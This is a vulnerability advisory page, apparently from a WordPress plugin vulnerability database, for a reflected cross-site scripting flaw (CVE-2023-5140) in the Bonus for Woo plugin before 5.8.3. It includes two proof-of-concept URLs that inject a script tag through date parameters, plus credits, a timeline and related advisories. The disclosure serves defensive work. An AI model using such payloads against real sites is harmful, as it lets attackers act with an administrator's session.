Bonus for Woo < 5.8.3 – Reflected Cross-Site Scripting | CVE 2023-5140 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

Proof of Concept

Make a logged in admin open one of the URL below

https://example.com/wp-admin/admin.php?page=bonus-for-woo%2Findex%2Flist_history.php&date_start=1"><script>alert(/XSS/)%3B<%2Fscript>

https://example.com/wp-admin/admin.php?page=bonus-for-woo%2Findex%2Flist_history.php&date_finish=1"><script>alert(/XSS/)%3B<%2Fscript>

Affects Plugins

Fixed in 5.8.3

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Enrico Marcolini, Claudio Marchesini

Submitter

Enrico Marcolini, Claudio Marchesini

Submitter website

https://www.dottormarc.it

Submitter twitter

Verified

Yes

WPVDB ID

ee1824e8-09a6-4763-b65e-03701dc3e171

Timeline

Publicly Published

2023-10-27 (about 2 years ago)

Added

2023-10-27 (about 2 years ago)

Last Updated

2023-11-06 (about 2 years ago)

Other

Published

Title

Published

2022-07-29

Title

Floating Div <= 3.0 - Author+ Stored Cross-Site Scripting

Published

2025-04-04

Title

VK Filter Search <= 2.18.3.0 - Contributor+ Stored XSS

Published

2024-06-20

Title

Tabs <= 4.0.6 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2025-11-24

Title

ZWeb - Social Mobile <= 1.0.0 - Authenticated (Admin+) Stored Cross-Site Scripting

Published

2024-11-04

Title

Ajax Content Filter <= 1.0 - Reflected Cross-Site Scripting